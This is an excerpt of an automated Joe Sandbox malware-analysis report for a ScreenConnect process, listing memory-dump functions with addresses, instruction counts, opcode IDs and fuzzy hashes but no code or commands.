Opcode Fuzzy Hash: 4ed5a8d4eeab964a77d8d6faea1aca86377199b5f1e7b5df09a89c2db4a0166b
Instruction Fuzzy Hash: C7A11574B00615CFDB14DFA9C594AADBBF6EF88300B108558E446AB365EB72ED41CF80

Function 01F6D069 Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75ec26d11315941d8e9f70aca7f0d122c8b3225338bb1a3c94f56ae7b45c2209
Instruction ID: 6926e1b6f5aa3169e2a207c17c6a43684e583eb8d5fbc3d7eb47156ef64ee6ef
Opcode Fuzzy Hash: 75ec26d11315941d8e9f70aca7f0d122c8b3225338bb1a3c94f56ae7b45c2209
Instruction Fuzzy Hash: 2B911574B00615CFDB14DFA8C594A9DBBF6EF88300B108598E846AB365EB32ED41CF90

Function 01F6E308 Relevance: .2, Instructions: 164COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d942fe736e6d6d007a93a40df7311abba8924d54335737869c8d4b4724a3daf0
Instruction ID: 14153eea2013412a695662ae30fb39fc9f13a43c441590cf4bd8b41d30b94873
Opcode Fuzzy Hash: d942fe736e6d6d007a93a40df7311abba8924d54335737869c8d4b4724a3daf0
Instruction Fuzzy Hash: 92517D79B002019FDB14DF7DC89496ABBE6EF993047108568E54ACF326EB31EC068B81

Function 01F6E318 Relevance: .2, Instructions: 157COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5d52bd7d5da2d53dd6e8c90b9cc82601e14074621aa962fee27e95eb7195cc7
Instruction ID: f8964d637b7162b07de53ee171043b136bf74972b94d9fd91eb83db522f3d37f
Opcode Fuzzy Hash: f5d52bd7d5da2d53dd6e8c90b9cc82601e14074621aa962fee27e95eb7195cc7
Instruction Fuzzy Hash: D0516E79B002059FDB14DF7DC89496AB7EAEF983047108568E54ADF316EB31EC068F91

Function 01F684A0 Relevance: .1, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e76164012ed7569d239ec5d535af9c983d82c95ddb8dfc569d77c36674306aea
Instruction ID: 7b40631d12ad3760b99fc7e4fec6d31b90e31a7ad9e6b230d607964b627a6f98
Opcode Fuzzy Hash: e76164012ed7569d239ec5d535af9c983d82c95ddb8dfc569d77c36674306aea
Instruction Fuzzy Hash: 1E51E470600B01CFD724CF2AD494966B7F6FF89365B248A5CE49A9B7A4DB32EC41CB44

Function 01F6B2D0 Relevance: .1, Instructions: 136COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58a5f730919000086f6f7e6310d26ee7119057001eccac9eec1c675d29056f4e
Instruction ID: af96b99ab726e5f07ce3331a9db75b72c6b167b5514468a618ece95ae8bb6db5
Opcode Fuzzy Hash: 58a5f730919000086f6f7e6310d26ee7119057001eccac9eec1c675d29056f4e
Instruction Fuzzy Hash: 62517774E103199FDB05EFB8D844B9DBBB1FF88300F108559E518AB254EB75AA85CFA0

Function 01F6B2C0 Relevance: .1, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f143d0a7eb083eeae8f7bf53eaceb5c43e4c1eb50b591fcb807caf99064cba07
Instruction ID: 2d13dd8870f7ac0ea02ab7a94aa3d69f06fb5012fd7c4a93073ddfa01496e7c9
Opcode Fuzzy Hash: f143d0a7eb083eeae8f7bf53eaceb5c43e4c1eb50b591fcb807caf99064cba07
Instruction Fuzzy Hash: C3515A74E103199FDB04DFA8D884B9DBBB2FF98300F108559E518AB254EB75A985CF60

Function 01F6EF67 Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af642095791fa60c2f6dc98d6da3cf8ebd4c855e80825ce3d33d6f21e17a2268
Instruction ID: eb4df7bf4349deafe133336a98fede5b48e094417a6bebf1e534bdbd5eb4c625
Opcode Fuzzy Hash: af642095791fa60c2f6dc98d6da3cf8ebd4c855e80825ce3d33d6f21e17a2268
Instruction Fuzzy Hash: C0418131E0020ADBDB15DFA8D890ADEBBB6FF89740F248129E505B7340DB71AD46CB91

Function 01F69968 Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2af555810119000282452896e116dfaa0572707181e819ecc7314535eb1c5b4
Instruction ID: 469e34d74c1566687e3eeafaf9212b5435927dbae1c2837991e8e5fe69dafd59
Opcode Fuzzy Hash: b2af555810119000282452896e116dfaa0572707181e819ecc7314535eb1c5b4
Instruction Fuzzy Hash: 2D41BC31A002019FCB14DF38D894AAD7BF6FF89214F1485A8E806DB3A1DF75AD06CB91

Function 01F69978 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41ad4431572d71a1435f4677ba507af9dcead434926f1b78e72cc31de38cd22e
Instruction ID: 71236db8cffb986d49305b4621128d97410aad6836b5bf05ee44a7fb7b577a8d
Opcode Fuzzy Hash: 41ad4431572d71a1435f4677ba507af9dcead434926f1b78e72cc31de38cd22e
Instruction Fuzzy Hash: 7A415B30B102119FCB14DF79D894AAEBBF6FF88614B104569E806EB3A0DF71AD05CB91

Function 01F67920 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 638ec4fdc3b9499437ef1fd9a7d43f01db91dc90ea486cbbed0cfdc05467cdfc
Instruction ID: 85d83bdd3af4339ad2d5a8839b6283aa9662ee846327d316926748f42bb02575
Opcode Fuzzy Hash: 638ec4fdc3b9499437ef1fd9a7d43f01db91dc90ea486cbbed0cfdc05467cdfc
Instruction Fuzzy Hash: 43317231B012058FEB149FAAC4546BEF7FAEF89358F148469E406EB754DB71ED048B90

Function 01F636A0 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84db475e95a3224939c3beb609e00c538c352ff55d2a6ced3d2f1a7c31af8b2e
Instruction ID: 5221cd9c7177244f28ea935c8c97abe9220b30aa53917ff584472f8940da6937
Opcode Fuzzy Hash: 84db475e95a3224939c3beb609e00c538c352ff55d2a6ced3d2f1a7c31af8b2e
Instruction Fuzzy Hash: 413134F2A04A15CFCB109F78D9942DEBBE4FF56324B148265C51E87286EB369903CF41

Function 01F652F8 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: acdb29c6eae31fb83a7137c003a15af56d04e8e4dd40c93ca12763111b6c1b9b
Instruction ID: ccbc0ef8801b9ff1deae18c0a60eed2dbedb06e22848b3fbbc7cec0f4da44ead
Opcode Fuzzy Hash: acdb29c6eae31fb83a7137c003a15af56d04e8e4dd40c93ca12763111b6c1b9b
Instruction Fuzzy Hash: D0317CB1D003099FCB14DFA9D8446DEFFF5EF88320F10846AD519A7240D779A9468FA1

Function 01F68A78 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d0f5b9dede82ab8b496d4d77f0fff6bbb37044c7780248cfaf959f959d50045
Instruction ID: 8bf29abce6bba2a5c30d85ccff7ebc3d86e61b9e2d984072fd4a29638756c9a1
Opcode Fuzzy Hash: 1d0f5b9dede82ab8b496d4d77f0fff6bbb37044c7780248cfaf959f959d50045
Instruction Fuzzy Hash: 40315C7690025ADFCF00DFACE8804DDBBB1FF89324B15856AD505BB211D731BA0ACBA1

Function 01F66568 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fe9a8e4b6f70204a99c094d5fc716f14f6fdeb7fb6cd2ffa0a54e053a81a084
Instruction ID: 7f65c16db2ee5e29fcbbedf17007482ca78b7107e7492bbcf9780bbeb8cbf433
Opcode Fuzzy Hash: 2fe9a8e4b6f70204a99c094d5fc716f14f6fdeb7fb6cd2ffa0a54e053a81a084
Instruction Fuzzy Hash: 45311C70A00701CFD730DF2AD85496ABBF5EF89325B144A28D456DB7A5DB32E946CF80

Function 01F636B0 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f6cfabb29281121c055ee12aa90e2db9209d9b19df64de904326b1a0e6ea599
Instruction ID: bb4b636478c364bdcf5c9a92d1fb5e57e0e1e15a820e787d8db36f88b2f8b121
Opcode Fuzzy Hash: 6f6cfabb29281121c055ee12aa90e2db9209d9b19df64de904326b1a0e6ea599
Instruction Fuzzy Hash: C1312575A04215DFCB04EFB8E95809EBBB5FF49310B0040A6D919D7345EB319E05CFA2

Function 01F6DC18 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe75ccd436a3b4c65d435b87239803909682817758761f1da61ded1a34f763f3
Instruction ID: 1f09eb06759a69fdbf4ef7c4a32f819e03bc44589b1b853c65bb83786a7d7786
Opcode Fuzzy Hash: fe75ccd436a3b4c65d435b87239803909682817758761f1da61ded1a34f763f3
Instruction Fuzzy Hash: C5313A70A00B05CFC730DF6ED84465ABBF5EF89325F104A18D0969B6A5D771E946CF80

Function 01F6DC14 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd8f18ac723c34ef6df2e6b2060f5fb17dbc39f3f8ff588aee76d7300330a0f5
Instruction ID: 1d4dae9a58caddfa17292fa2285a73625754e0908c632fe7b8f55d8e6606519f
Opcode Fuzzy Hash: cd8f18ac723c34ef6df2e6b2060f5fb17dbc39f3f8ff588aee76d7300330a0f5
Instruction Fuzzy Hash: D4313A70A00B05CFCB30DF69C84465ABBF5EF89325F144B18D0969B6A5D771E946CF80

Function 01F690A8 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6eb0196643c5adbfb484347dd93742dae1808a053831fa294f73d43229e75a9b
Instruction ID: 383ed301e89ee86b6026208283ab4cd3d16b22e944a53e85519885696cbc888f
Opcode Fuzzy Hash: 6eb0196643c5adbfb484347dd93742dae1808a053831fa294f73d43229e75a9b
Instruction Fuzzy Hash: 22314730A00701CFD730CF29C88896AB7F5FF89314B244A2CD49ADB2A1D771E945CB90

Function 01F6DDC0 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3523becc540128c7d6173707e454ed1a1125094524026e306e76e66f30c635b
Instruction ID: cefad228739ccac21a1f315644f12b07962ea0357d4903b22be4f536035eea52
Opcode Fuzzy Hash: c3523becc540128c7d6173707e454ed1a1125094524026e306e76e66f30c635b
Instruction Fuzzy Hash: 2C310670B00701CFD730DF6AC84466ABBF5AFA9315B108A28D5A69B7A5D731E946CF80

Function 01F68B30 Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f6f48efe9c041009373a928dbec1912435bf59ef844727d088dc9ddb348f35f
Instruction ID: 4eb2bdc542fa899eb428cd006114cc9c6004378afe9d27ba7e47ad47a8fbbc16
Opcode Fuzzy Hash: 4f6f48efe9c041009373a928dbec1912435bf59ef844727d088dc9ddb348f35f
Instruction Fuzzy Hash: 2A21BF7290025A9BDB05DFACD8804DDBFB2FF85354B48C529D109BB215DB32A94BCB91

Function 018BD688 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2932157013.00000000018BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 018BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_18bd000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50e858ff90ecd2c5c067ea0dd588d143f6599f83ab5e1c1c64034a146c5f129f
Instruction ID: 76308941ad14eee33472fef4b1457a66369412d1a307d6a3d7e4552d162055fe
Opcode Fuzzy Hash: 50e858ff90ecd2c5c067ea0dd588d143f6599f83ab5e1c1c64034a146c5f129f
Instruction Fuzzy Hash: 88213375504244EFCB05DF58D9C4BA6BFA5FB98328F20C668E80A8B346C336D516CBA1

Function 01F68C20 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8f2b6bb2a30711554d66230463c310659f1010e86006f5f85b5eb034cc98c93
Instruction ID: a3db14a9dc4b58bbb97184865682c1caa5b59d9e0155d5d7026731cb5cf5571a
Opcode Fuzzy Hash: f8f2b6bb2a30711554d66230463c310659f1010e86006f5f85b5eb034cc98c93
Instruction Fuzzy Hash: 4221A471A002115BD700E76898916ADBBA2FFC5210F408525D605EB395DA70AE0AC7D2

Function 01F6E198 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34dd83434297eb21916ee8dc9aeddc5bb27b57c01ddd1a7969a66317d0c087ea
Instruction ID: 5cf265d3e424a388ecdc56a77e6631500806db6855a028c1ef3b33106c1449c0
Opcode Fuzzy Hash: 34dd83434297eb21916ee8dc9aeddc5bb27b57c01ddd1a7969a66317d0c087ea
Instruction Fuzzy Hash: C6215E71B006199FCB00DF68D8819AEB7F5FF88311B008529E509DB715EB31AD068B90

Function 01F686D0 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b78cac36765c157f6cbfe53c80ca5d3c45e3fb190851b578cee643d22f06fdd2
Instruction ID: 6e9d61b59bfdf2a10dd6e85819cb5af2129d6333a597039d38d125426bd26f44
Opcode Fuzzy Hash: b78cac36765c157f6cbfe53c80ca5d3c45e3fb190851b578cee643d22f06fdd2
Instruction Fuzzy Hash: 6E217A30600705CFD730CF2AC84459ABBF5EF84361F108A2CE493976A0DB32A94ACF90

Function 01F6F2CC Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ba0a2aabbb1784db9a7c1e1a2c53a3af4aa827034162c4cee02646c74e7e57a
Instruction ID: 88aa5ed9fd7374bc9eeb115e7b334c88fa697f94740d93a51b10ef04142647f5
Opcode Fuzzy Hash: 2ba0a2aabbb1784db9a7c1e1a2c53a3af4aa827034162c4cee02646c74e7e57a
Instruction Fuzzy Hash: 0C2145B6C00249DFDB10CF9AD844ADEBBF5FB88310F148429E929A7201C339A555DFA1

Function 01F6A7B0 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f50ed88fc97d8a291cab03ba151d8e5fa53ebd82e95559d5426eef70f6a5cdf9
Instruction ID: f93f0e2cee54b271c7c0642d1888a9413d2a1df7835a0a3a3383f44fe12bbdea
Opcode Fuzzy Hash: f50ed88fc97d8a291cab03ba151d8e5fa53ebd82e95559d5426eef70f6a5cdf9
Instruction Fuzzy Hash: E9212F70A01701CFDB24DF39D444A6ABBF5FF48310B108A6CD4AA97694E735E901CF80

Function 01F68C30 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d69a0efc13477d673184f1309030ab30cc9cabb16bf085dd02b69e14b05f056
Instruction ID: 7c600fe695be09b45777d5672635bc27f9272db977c4a1f7b189bd03f3d1bf8c
Opcode Fuzzy Hash: 8d69a0efc13477d673184f1309030ab30cc9cabb16bf085dd02b69e14b05f056
Instruction Fuzzy Hash: 7C1181717002156BDB00EB68D8816AEB6E2FFC4310F508929D609EB394DF70BE09C7D2

Function 01F6F878 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12690a3f679d851162283a108187eb9c8cd03b9634870169f37400ca0ba85f93
Instruction ID: cbf67640b2d3c279e78bbfe24f6ee8fcb41e65238bc17672b3e8bfe5e3744ff7
Opcode Fuzzy Hash: 12690a3f679d851162283a108187eb9c8cd03b9634870169f37400ca0ba85f93
Instruction Fuzzy Hash: 182157B6C00249CFCB11CF99D884ADEBBF6FB88310F148519E929A7211C739A555DFA1

Function 01F6A9A1 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5f239f2745d08981a774df7cd70dca5ea4e77a2f2583c50f650c3204b7e500b
Instruction ID: a8e39127a82b4d3eb811498ad7fa8df769ae1509a7ad2adb1f43f9d9dbb44814
Opcode Fuzzy Hash: d5f239f2745d08981a774df7cd70dca5ea4e77a2f2583c50f650c3204b7e500b
Instruction Fuzzy Hash: 9C113A32B0D3915FC7078B38986019A7FB8EF8211431945EBD405DF313EA329C06CB90

Function 01F6E1A8 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9eac4d58947c1a0636fc163d2085b3fd21308c42d7a6a23083bac4ff202866bf
Instruction ID: 0bed15e11cc7b3498c24b19f486295e5209e3b841189a06f4b6e091b0b78b816
Opcode Fuzzy Hash: 9eac4d58947c1a0636fc163d2085b3fd21308c42d7a6a23083bac4ff202866bf
Instruction Fuzzy Hash: 78113D71B00619AFCB10DF68D9859AEBBF5FF88311B408529E519AB314EB31BD058F91

Function 01F6ED77 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d51948a5c40cb6526a8d6066252d53a83a5517bddc7f5a8c858b521fef17309c
Instruction ID: 23908e796bdc2912d507bbcb9c016bd92627c8d6f789d69115d37d8041eeeb4d
Opcode Fuzzy Hash: d51948a5c40cb6526a8d6066252d53a83a5517bddc7f5a8c858b521fef17309c
Instruction Fuzzy Hash: 62211732E10B0A99CB10EFB9D8505EEF7B4EF99310F10C72AD559B7111FB70A2958B81

Function 01F6E168 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 110fea5ecaae3c46a858ed3fef78576f410ad064163fef2eaefa0c6c6f202579
Instruction ID: cd570a0acf7bca8c56f7606000a8f203ba824a381a2ff95442bac28babe29a39
Opcode Fuzzy Hash: 110fea5ecaae3c46a858ed3fef78576f410ad064163fef2eaefa0c6c6f202579
Instruction Fuzzy Hash: D311E271700605AFC700DFA8DD818AEBBB1FF84302B008569E5099B315EB31BD06CF91

Function 01F68AA0 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d36d8db482d1078b671069c99bbf1ee9cbf5ef2da9392f169ff978ec6b2f8e86
Instruction ID: eb0e38083011a4609d6b13da649f10de4ac8849e793452d02e36e3c34dccc9ac
Opcode Fuzzy Hash: d36d8db482d1078b671069c99bbf1ee9cbf5ef2da9392f169ff978ec6b2f8e86
Instruction Fuzzy Hash: 3811287690021A9FCF01DFA8D9805DEBBF1FF49314B108556DA04BB251E771BE0ACB91

Function 01F691A8 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1cf6c01c1c2ac3d65e22867e5919fd3b8a43b68a079526167e60580990bd3df2
Instruction ID: ecb41fcc92ade1e6d9e5cc74f2e3c3b2196003a5318c62f33d67b3dd0b34f0d4
Opcode Fuzzy Hash: 1cf6c01c1c2ac3d65e22867e5919fd3b8a43b68a079526167e60580990bd3df2
Instruction Fuzzy Hash: 1611C2B2E00204AFDB15CA6CD8405EBBBBAFFC4314B148566D554D7155E3B29A42CB90

Function 018BD683 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2932157013.00000000018BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 018BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_18bd000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
Instruction ID: 972a839634f03eea27a85225f405f291e3c227d99df0d6f6e5098eb894ce2f86
Opcode Fuzzy Hash: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
Instruction Fuzzy Hash: AD11E176504280DFCB02CF54D5C4B96BF72FB84328F24C2A9D8094B257C336D55ACBA2

Function 01F64E44 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bb8ad357a6cfbf0ce3d6e9b28a89c88d7a007208ed0db668f32939c0dca45d3
Instruction ID: 169273d1c503e4804b1aa8dcdaf53a7bbc04a5c800cf1c1fe43545db867a8380
Opcode Fuzzy Hash: 4bb8ad357a6cfbf0ce3d6e9b28a89c88d7a007208ed0db668f32939c0dca45d3
Instruction Fuzzy Hash: F02124B18002099FDB10CF9AC845ADEFBF5EB48320F10842AD519A7241D379A545CFA5

Function 01F6FA80 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11827ef591e51a9c97d367efbeb7206cca277b018a30fd80cf348996bd419df8
